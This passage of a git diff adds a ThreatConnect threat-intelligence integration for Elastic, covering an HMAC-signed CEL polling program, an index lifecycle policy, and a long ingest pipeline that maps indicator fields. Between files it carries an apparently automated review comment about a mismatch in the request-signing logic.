string(state.cursor.last_timestamp) + : + string((now - duration(state.initial_interval)).format(time_layout.RFC3339)).split("+")[0] + ) + : + (has(state.cursor) && has(state.cursor.first_timestamp) && state.cursor.first_timestamp != null ? + state.cursor.first_timestamp + : + "" + ) + )+'"'+( + has(state.tql_filter) && state.tql_filter != null && state.tql_filter != "" ? + " AND "+state.tql_filter.trim(" ") + : + "" + ) + ], + }.format_query() + : + state.next_url + ) + ) + .with({ + "Header": { + "Authorization": ["TC "+ string(state.access_id) + ":" + + base64( + bytes( + ( + has(state.next_url) && state.next_url.contains_substr("/api") ? 
+ "/api" + state.next_url.split("/api")[1] + : + "/api/v3/indicators?" + + { + "fields": state.event_list, + "resultStart": ["0"], + "resultLimit": [string(state.batch)], + "sorting": ["lastModified asc"], + "tql": ['lastModified GEQ "'+( + !state.want_more ? + (has(state.cursor) && has(state.cursor.last_timestamp) && state.cursor.last_timestamp != null ? + string(state.cursor.last_timestamp) + : + string((now - duration(state.initial_interval)).format(time_layout.RFC3339)).split("+")[0] + ) + : + (has(state.cursor) && has(state.cursor.first_timestamp) && state.cursor.first_timestamp != null ? + state.cursor.first_timestamp + : + "" + ) + )+'"'+( + has(state.tql_filter) && state.tql_filter != null && state.tql_filter != "" ? + " AND "+state.tql_filter.trim(" ") + : + "" + ) + ], + }.format_query() + ) + + ":GET:" + string(int(now)) + ).hmac("sha256", bytes(state.secret_key))) + ], + "Timestamp": [string(int(now))] + } + }) + .do_request() + .as(resp, bytes(resp.Body).decode_json().as(body, { + "events": body.data.map(e, { + "message": e.encode_json(), + }), + "url": state.url, + "counter": has(body.next) && body.next != null && body.next != "" ? int(state.counter) + int(state.batch) : 0, + "access_id": state.access_id, + "secret_key": state.secret_key, + "want_more": has(body.next) && body.next != null && body.next != "", + "batch": state.batch, + "initial_interval": state.initial_interval, + "event_list": has(state.event_list) && state.event_list != null && state.event_list != "" ? state.event_list : null, + "tql_filter": has(state.tql_filter) && state.tql_filter != null && state.tql_filter != "" ? state.tql_filter : null, + "next_url": ( + has(body.next) && body.next != null && body.next != "" ? + state.url + "/api/v3/indicators?" + + { + "fields": state.event_list, + "resultStart": [string(int(state.counter) + body.data.size())], + "resultLimit": [string(state.batch)], + "sorting": ["lastModified asc"], + "tql": ['lastModified GEQ "'+( + !state.want_more ? 
+ (has(state.cursor) && has(state.cursor.last_timestamp) && state.cursor.last_timestamp != null ? + string(state.cursor.last_timestamp) + : + string((now - duration(state.initial_interval)).format(time_layout.RFC3339)).split("+")[0] + ) + : + (has(state.cursor) && has(state.cursor.first_timestamp) && state.cursor.first_timestamp != null ? + state.cursor.first_timestamp + : + "" + ) + )+'"'+( + has(state.tql_filter) && state.tql_filter != null && state.tql_filter != "" ? + " AND "+state.tql_filter.trim(" ") + : + "" + ) + ], + }.format_query() + : + state.url + ), + "cursor": { + "last_timestamp": ( + has(body.data) && body.data.size() > 0 ? + string((body.data.map(e, e.lastModified).max()).parse_time(time_layout.RFC3339) + duration("1s")).split("+")[0] + : + has(state.cursor) && has(state.cursor.last_timestamp) ? + state.cursor.last_timestamp + : + null + ), + "first_timestamp": ( + has(state.cursor) && has(state.cursor.first_timestamp) && has(body.data) && state.cursor.first_timestamp != null ? + (has(body.next) && body.next != null && body.next != "" ? + state.cursor.first_timestamp + : + state.cursor.last_timestamp) + : + string((now - duration(state.initial_interval)).format(time_layout.RFC3339)).split("+")[0] + ) + } + })) +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if processors}} +processors: +{{processors}} +{{/if}} diff --git a/packages/ti_threatconnect/data_stream/indicator/elasticsearch/ilm/default_policy.json b/packages/ti_threatconnect/data_stream/indicator/elasticsearch/ilm/default_policy.json new file mode 100644 index 00000000000..eb4f660adf4 --- /dev/null +++ b/packages/ti_threatconnect/data_stream/indicator/elasticsearch/ilm/default_policy.json 
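Review bot: The condition that selects what gets HMAC-signed for the `Authorization` header does not match the condition that selects what gets requested: the request uses `state.next_url` only when `state.want_more` is true, while the signature uses `"/api" + state.next_url.split("/api")[1]` whenever `state.next_url` exists and contains `/api`. Because the program stores `state.url` into `next_url` once the last page is reached, a later interval with `want_more` false and a configured `url` that itself contains `/api` (a path-prefixed or reverse-proxied deployment) would sign a stale path while sending the freshly built query, and the API would reject it. Gate the signature branch the same way as the request: `state.want_more && has(state.next_url) && state.next_url.contains_substr("/api") ?`. Independently, `split("/api")[1]` cuts at the first occurrence, so a base URL containing `/api` would also be mis-signed during pagination; stripping `state.url` from `state.next_url` instead would be safer, though I cannot confirm the vendor's signing spec from this hunk.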
@@ -0,0 +1,23 @@
+{
+ "policy": {
+ "phases": {
+ "hot": {
+ "actions": {
+ "rollover": {
+ "max_age": "1d",
+ "max_size": "50gb"
+ },
+ "set_priority": {
+ "priority": 100
+ }
+ }
+ },
+ "delete": {
+ "min_age": "2d",
+ "actions": {
+ "delete": {}
+ }
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/packages/ti_threatconnect/data_stream/indicator/elasticsearch/ingest_pipeline/default.yml b/packages/ti_threatconnect/data_stream/indicator/elasticsearch/ingest_pipeline/default.yml
new file mode 100644
index 00000000000..bbb271b23cc
--- /dev/null
+++ b/packages/ti_threatconnect/data_stream/indicator/elasticsearch/ingest_pipeline/default.yml
@@ -0,0 +1,2246 @@ +--- +description: Pipeline for processing indicator logs. +processors: + - set: + field: ecs.version + tag: set_ecs_version + value: 8.11.0 + - set: + field: event.kind + tag: set_event_kind + value: enrichment + - append: + field: event.category + tag: append_threat_into_event_category + value: threat + allow_duplicates: false + - append: + field: event.type + tag: append_indicator_into_event_type + value: indicator + allow_duplicates: false + - set: + field: threat.indicator.provider + tag: set_threat_indicator_provider + value: ThreatConnect + - rename: + field: message + tag: rename_message_to_event_original + target_field: event.original + if: ctx.event?.original == null + ignore_missing: true + - json: + field: event.original + tag: json_event_original + target_field: json + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - fingerprint: + fields: + - json.summary + - json.lastModified + target_field: _id + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - script: + lang: painless + tag: script-default-deleted_at + if: ctx.json?.deleted_at == null && ctx.json?.lastModified != null && ctx._conf?.ioc_expiration_duration != null && ctx._conf.ioc_expiration_duration != '' + description: Add default deleted_at field. 
+ source: > + def dur = ctx._conf.ioc_expiration_duration; + String lastModified = ctx.json.lastModified; + if (dur instanceof String){ + String time_unit = dur.substring(dur.length() - 1, dur.length()); + String time_value = dur.substring(0, dur.length() - 1); + if (time_unit == 'd') { + ctx.json.deleted_at = ZonedDateTime.parse(lastModified).plusDays(Long.parseLong(time_value)); + } else if (time_unit == 'h') { + ctx.json.deleted_at = ZonedDateTime.parse(lastModified).plusHours(Long.parseLong(time_value)); + } else if (time_unit == 'm') { + ctx.json.deleted_at = ZonedDateTime.parse(lastModified).plusMinutes(Long.parseLong(time_value)); + } else { + ctx.json.deleted_at = ZonedDateTime.parse(lastModified).plusDays(90L); + } + } + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.deleted_at + tag: date_deleted_at + target_field: threat_connect.indicator.deleted_at + formats: + - ISO8601 + - UNIX + if: ctx.json?.deleted_at != null && ctx.json.deleted_at != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: _conf.ioc_expiration_duration + tag: rename_conf_ioc_expiration_duration + target_field: threat_connect.indicator.expiration_duration + ignore_missing: true + - convert: + field: json.activeLocked + tag: convert_activeLocked_to_boolean + target_field: threat_connect.indicator.active.locked + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline 
{{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.active + tag: convert_active_to_boolean + target_field: threat_connect.indicator.active.value + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.address + tag: rename_address + target_field: threat_connect.indicator.address + ignore_missing: true + - dissect: + if: ctx.threat_connect?.indicator?.address != null && ctx.threat_connect.indicator.address.contains('@') + tag: dissect_threat_connect_indicator_address + field: threat_connect.indicator.address + pattern: '%{user.name}@%{user.domain}' + - append: + field: related.user + tag: append_user_name_into_related_user + value: "{{{user.name}}}" + allow_duplicates: false + if: ctx.user?.name != null + - set: + field: threat.indicator.email.address + tag: set_threat_indicator_email_address_from_indicator_address + copy_from: threat_connect.indicator.address + ignore_empty_value: true + - set: + field: user.email + tag: set_user_email_from_indicator_address + copy_from: threat_connect.indicator.address + ignore_empty_value: true + - rename: + field: json.AS Number + tag: rename_AS Number + target_field: threat_connect.indicator.as_number + ignore_missing: true + - gsub: + field: threat_connect.indicator.as_number + tag: replace_string_values_with_space + target_field: threat_connect.indicator.temp + pattern: '[a-zA-Z]' + replacement: ' ' + ignore_missing: true + - trim: + field: threat_connect.indicator.temp + tag: trim_white_spaces_from_string + ignore_missing: true + ignore_failure: true + - convert: + field: threat_connect.indicator.temp + tag: convert_as_number_string_to_long + target_field: threat.indicator.as.number + type: long + 
ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - remove: + field: threat_connect.indicator.temp + ignore_missing: true + - rename: + field: json.associatedArtifacts + tag: rename_associatedArtifacts + target_field: threat_connect.indicator.associated_artifacts + ignore_missing: true + - rename: + field: json.associatedCases + tag: rename_associatedCases + target_field: threat_connect.indicator.associated_cases + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_associated_data_rename_firstname + processor: + rename: + field: _ingest._value.createdBy.firstName + tag: rename_associatedGroups_data_createdBy_firstName + target_field: _ingest._value.created_by.first_name + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_associated_groups_data_created_by_firstname_append_into_related_user + processor: + append: + field: related.user + tag: append_associatedGroups_data_createdBy_firstName_into_related_user + value: '{{{_ingest._value.created_by.first_name}}}' + allow_duplicates: false + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_associated_data_convert_createdby_id + processor: + convert: + field: _ingest._value.createdBy.id + tag: convert_associatedGroups_data_createdBy_id_to_string + target_field: _ingest._value.created_by.id + type: string + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.createdBy.id + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline 
{{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_associated_data_convert_assignments_data_id + processor: + foreach: + field: _ingest._value.assignments.data + ignore_missing: true + tag: foreach_assignments_data + processor: + convert: + field: _ingest._value.user.id + tag: convert_associatedGroups_data_assignments_data_user_id_to_string + target_field: _ingest._value.user.id + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_associated_data_rename_assignments_data_type + processor: + rename: + field: _ingest._value.assignments.data.type + tag: rename_associatedGroups_data_assignments_data_type + target_field: _ingest._value.assignments.data.type + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_associated_data_rename_createdby_lastname + processor: + rename: + field: _ingest._value.createdBy.lastName + tag: rename_associatedGroups_data_createdBy_lastName + target_field: _ingest._value.created_by.last_name + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_associatedGroups_data_last_name_append_into_related_user + processor: + append: + field: related.user + tag: append_associatedGroups_data_createdBy_lastName_into_related_user + value: '{{{_ingest._value.created_by.last_name}}}' + allow_duplicates: false + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + 
tag: foreach_associated_data_rename_createdby_owner + processor: + rename: + field: _ingest._value.createdBy.owner + tag: rename_associatedGroups_data_createdBy_owner + target_field: _ingest._value.created_by.owner + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_associated_data_rename_createdBy_pseudonym + processor: + rename: + field: _ingest._value.createdBy.pseudonym + tag: rename_associatedGroups_data_createdBy_pseudonym + target_field: _ingest._value.created_by.pseudonym + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_rename_associatedGroups_data_createdBy_userName + processor: + rename: + field: _ingest._value.createdBy.userName + tag: rename_associatedGroups_data_createdBy_userName + target_field: _ingest._value.created_by.user_name + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_append_associatedGroups_data_createdBy_userName_into_related_user + processor: + append: + field: related.user + tag: append_associatedGroups_data_createdBy_userName_into_related_user + value: '{{{_ingest._value.created_by.user_name}}}' + allow_duplicates: false + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_append_associatedGroups_data_to_email + processor: + append: + field: email.to.address + tag: append_associatedGroups_data_to_email + value: '{{{_ingest._value.to}}}' + allow_duplicates: false + ignore_failure: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_append_associatedGroups_data_from_email + processor: + append: + field: email.from.address + tag: append_associatedGroups_data_from_email + value: '{{{_ingest._value.from}}}' + allow_duplicates: false + ignore_failure: true + - foreach: + 
field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_date_associatedGroups_data_dateAdded + processor: + date: + field: _ingest._value.dateAdded + tag: date_associatedGroups_data_dateAdded + target_field: _ingest._value.date_added + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.dateAdded + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_date_associatedGroups_data_documentDateAdded + processor: + date: + field: _ingest._value.documentDateAdded + tag: date_associatedGroups_data_documentDateAdded + target_field: _ingest._value.document.date_added + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.documentDateAdded + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_rename_associatedGroups_data_documentType + processor: + rename: + field: _ingest._value.documentType + tag: rename_associatedGroups_data_documentType + target_field: _ingest._value.document.type + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_rename_associatedGroups_data_downVoteCount + processor: + rename: + field: _ingest._value.downVoteCount + tag: rename_associatedGroups_data_downVoteCount + target_field: _ingest._value.down_vote_count + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_date_associatedGroups_data_dueDate + processor: + date: + field: _ingest._value.dueDate + tag: date_associatedGroups_data_dueDate + target_field: _ingest._value.due_date + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.dueDate + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: 
foreach_date_associatedGroups_data_emailDate + processor: + date: + field: _ingest._value.emailDate + tag: date_associatedGroups_data_emailDate + target_field: _ingest._value.email_date + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.emailDate + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_date_associatedGroups_data_escalationDate + processor: + date: + field: _ingest._value.escalationDate + tag: date_associatedGroups_data_escalationDate + target_field: _ingest._value.escalation_date + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.escalationDate + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_date_associatedGroups_data_eventDate + processor: + date: + field: _ingest._value.eventDate + tag: date_associatedGroups_data_eventDate + target_field: _ingest._value.event_date + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.eventDate + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_date_associatedGroups_data_externalDateAdded + processor: + date: + field: _ingest._value.externalDateAdded + tag: date_associatedGroups_data_externalDateAdded + target_field: _ingest._value.external.date.added + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.externalDateAdded + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_date_associatedGroups_data_externalDateExpires + processor: + date: + field: _ingest._value.externalDateExpires + tag: date_associatedGroups_data_externalDateExpires + target_field: _ingest._value.external.date.expires + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.externalDateExpires + ignore_missing: true + - 
foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_date_associatedGroups_data_externalLastModified + processor: + date: + field: _ingest._value.externalLastModified + tag: date_associatedGroups_data_externalLastModified + target_field: _ingest._value.external.last_modified + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.externalLastModified + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_rename_associatedGroups_data_fileName + processor: + rename: + field: _ingest._value.fileName + tag: rename_associatedGroups_data_fileName + target_field: _ingest._value.file.name + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + processor: + convert: + field: _ingest._value.fileSize + tag: convert_associatedGroups_data_filesize_to_string + target_field: _ingest._value.file.size + type: string + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.fileSize + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_rename_associatedGroups_data_fileText + processor: + rename: + field: _ingest._value.fileText + tag: rename_associatedGroups_data_fileText + target_field: _ingest._value.file.text + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_rename_associatedGroups_data_fileType + processor: + rename: + field: _ingest._value.fileType + tag: rename_associatedGroups_data_fileType + target_field: _ingest._value.file.type + ignore_missing: 
true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_date_associatedGroups_data_firstSeen + processor: + date: + field: _ingest._value.firstSeen + tag: date_associatedGroups_data_firstSeen + target_field: _ingest._value.first_seen + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.firstSeen + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_convert_associatedGroups_data_generatedReport_to_boolean + processor: + convert: + field: _ingest._value.generatedReport + tag: convert_associatedGroups_data_generatedReport_to_boolean + target_field: _ingest._value.generated_report + type: boolean + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.generatedReport + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_date_associatedGroups_data_lastModified + processor: + date: + field: _ingest._value.lastModified + tag: date_associatedGroups_data_lastModified + target_field: _ingest._value.last_modified + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.lastModified + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_date_associatedGroups_data_lastSeen + processor: + date: + field: _ingest._value.lastSeen + tag: date_associatedGroups_data_lastSeen + target_field: _ingest._value.last_seen + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.lastSeen + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: 
ctx.json?.associatedGroups?.data != null + tag: foreach_rename_associatedGroups_data_legacyLink + processor: + rename: + field: _ingest._value.legacyLink + tag: rename_associatedGroups_data_legacyLink + target_field: _ingest._value.legacy_link + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_convert_associatedGroups_data_malware_to_boolean + processor: + convert: + field: _ingest._value.malware + tag: convert_associatedGroups_data_malware_to_boolean + type: boolean + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.malware + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_convert_associatedGroups_data_ownerId_to_string + processor: + convert: + field: _ingest._value.ownerId + tag: convert_associatedGroups_data_ownerId_to_string + target_field: _ingest._value.owner.id + type: string + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_rename_associatedGroups_data_ownerName + processor: + rename: + field: _ingest._value.ownerName + tag: rename_associatedGroups_data_ownerName + target_field: _ingest._value.owner.name + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_date_associatedGroups_data_publishDate + processor: + date: + field: _ingest._value.publishDate + tag: date_associatedGroups_data_publishDate + target_field: _ingest._value.publish_date + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.publishDate + ignore_missing: true + - foreach: + field: 
json.associatedGroups.data
+ if: ctx.json?.associatedGroups?.data != null
+ tag: foreach_date_associatedGroups_data_reminderDate
+ processor:
+ date:
+ field: _ingest._value.reminderDate
+ tag: date_associatedGroups_data_reminderDate
+ target_field: _ingest._value.reminder_date
+ formats:
+ - ISO8601
+ on_failure:
+ - remove:
+ field: _ingest._value.reminderDate
+ ignore_missing: true
+ - foreach:
+ field: json.associatedGroups.data
+ if: ctx.json?.associatedGroups?.data != null
+ tag: foreach_rename_associatedGroups_data_scoreBreakdown
+ processor:
+ rename:
+ field: _ingest._value.scoreBreakdown
+ tag: rename_associatedGroups_data_scoreBreakdown
+ target_field: _ingest._value.score_breakdown
+ ignore_missing: true
+ - foreach:
+ field: json.associatedGroups.data
+ if: ctx.json?.associatedGroups?.data != null
+ tag: foreach_convert_associatedGroups_data_scoreIncludesBody_to_boolean
+ processor:
+ convert:
+ field: _ingest._value.scoreIncludesBody
+ tag: convert_associatedGroups_data_scoreIncludesBody_to_boolean
+ target_field: _ingest._value.score_includes_body
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - remove:
+ field: _ingest._value.scoreIncludesBody
+ ignore_missing: true
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - foreach:
+ field: json.associatedGroups.data
+ if: ctx.json?.associatedGroups?.data != null
+ tag: foreach_convert_associatedGroups_data_upVote_to_boolean
+ processor:
+ convert:
+ field: _ingest._value.upVote
+ tag: convert_associatedGroups_data_upVote_to_boolean
+ target_field: _ingest._value.up_vote
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - remove:
+ field: _ingest._value.upVote
+ ignore_missing: true
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag
{{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - foreach:
+ field: json.associatedGroups.data
+ if: ctx.json?.associatedGroups?.data != null
+ tag: foreach_rename_associatedGroups_data_upVoteCount
+ processor:
+ rename:
+ field: _ingest._value.upVoteCount
+ tag: rename_associatedGroups_data_upVoteCount
+ target_field: _ingest._value.up_vote_count
+ ignore_missing: true
+ - foreach:
+ field: json.associatedGroups.data
+ if: ctx.json?.associatedGroups?.data != null
+ tag: foreach_rename_associatedGroups_data_webLink
+ processor:
+ rename:
+ field: _ingest._value.webLink
+ tag: rename_associatedGroups_data_webLink
+ target_field: _ingest._value.web_link
+ ignore_missing: true
+ - foreach:
+ field: json.associatedGroups.data
+ if: ctx.json?.associatedGroups?.data != null
+ tag: foreach_convert_associatedGroups_data_id_to_string
+ processor:
+ convert:
+ field: _ingest._value.id
+ tag: convert_associatedGroups_data_id_to_string
+ target_field: _ingest._value.id
+ type: string
+ ignore_missing: true
+ on_failure:
+ - remove:
+ field: _ingest._value.upVote
+ ignore_missing: true
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - rename:
+ field: json.associatedGroups.data
+ tag: rename_associatedGroups_data
+ target_field: threat_connect.indicator.associated_groups.data
+ ignore_missing: true
+ - foreach:
+ field: threat_connect.indicator.associated_groups.data
+ if: ctx.threat_connect?.indicator?.associated_groups?.data != null
+ tag: foreach_remove_duplicate_fields
+ processor:
+ remove:
+ field:
+ - _ingest._value.createdBy.firstName
+ - _ingest._value.createdBy.lastName
+ - _ingest._value.createdBy.id
+ - _ingest._value.dueDate
+ - _ingest._value.downVoteCount
+ -
_ingest._value.documentType
+ - _ingest._value.externalDateAdded
+ - _ingest._value.externalDateExpires
+ - _ingest._value.externalLastModified
+ - _ingest._value.fileName
+ - _ingest._value.fileText
+ - _ingest._value.fileSize
+ - _ingest._value.fileType
+ - _ingest._value.eventDate
+ - _ingest._value.escalationDate
+ - _ingest._value.emailDate
+ - _ingest._value.firstSeen
+ - _ingest._value.lastSeen
+ - _ingest._value.lastModified
+ - _ingest._value.documentDateAdded
+ - _ingest._value.dateAdded
+ - _ingest._value.userName
+ - _ingest._value.reminderDate
+ - _ingest._value.publishDate
+ - _ingest._value.ownerId
+ - _ingest._value.ownerName
+ - _ingest._value.generatedReport
+ - _ingest._value.webLink
+ - _ingest._value.upVoteCount
+ - _ingest._value.upVote
+ - _ingest._value.scoreIncludesBody
+ - _ingest._value.scoreBreakdown
+ - _ingest._value.to
+ - _ingest._value.from
+ tag: remove_duplicate_fields
+ ignore_missing: true
+ - script:
+ lang: painless
+ description: This script rename fields belongs to json associatedIndicators data objects.
+ if: ctx.json?.associatedIndicators?.data != null
+ params:
+ "AS Number": "as_number"
+ "hostName": "host_name"
+ "Hashtag": "hashtag"
+ "Key Name": "key_name"
+ "legacyLink": "legacy_link"
+ "Mutex": "mutex"
+ "Subject": "subject"
+ "User Agent String": "user_agent_string"
+ "webLink": "web_link"
+ tag: painless_to_rename_fields_under_json_associatedIndicators_data_object
+ source: |
+ def renameKeys(Map json, Map keyMap) {
+ def updatedJson = new HashMap();
+ for (def entry: json.entrySet()) {
+ def key = entry.getKey();
+ def value = entry.getValue();
+ if (value instanceof Map) {
+ if (keyMap.containsKey(key)) {
+ updatedJson[keyMap[key]] = renameKeys(value, keyMap);
+ } else {
+ updatedJson[key] = renameKeys(value, keyMap);
+ }
+ } else if (value instanceof List) {
+ def updatedList = [];
+ for (def item: value) {
+ if (item instanceof Map) {
+ updatedList.add(renameKeys(item, keyMap));
+ } else {
+ updatedList.add(item);
+ }
+ }
+ if (keyMap.containsKey(key)) {
+ updatedJson[keyMap[key]] = updatedList;
+ } else {
+ updatedJson[key] = value;
+ }
+ } else {
+ if (keyMap.containsKey(key)) {
+ updatedJson[keyMap[key]] = value;
+ } else {
+ updatedJson[key] = value;
+ }
+ if (key=='location') {
+ updatedJson['location_value'] = value;
+ updatedJson.remove('location');
+ }
+ }
+ }
+ return updatedJson;
+ }
+ def entities_obj = new ArrayList();
+ for(entity in ctx.json.associatedIndicators.data){
+ entities_obj.add(renameKeys(entity, params));
+ }
+ ctx.entities_obj=entities_obj;
+ - rename:
+ field: entities_obj
+ target_field: threat_connect.indicator.associated_indicators.data
+ tag: rename_entities_obj
+ ignore_missing: true
+ - foreach:
+ field: threat_connect.indicator.associated_indicators.data
+ if: ctx.threat_connect?.indicator?.associated_indicators?.data != null
+ tag: foreach_convert_associatedIndicators_data_size_to_string
+ processor:
+ convert:
+ field: _ingest._value.size
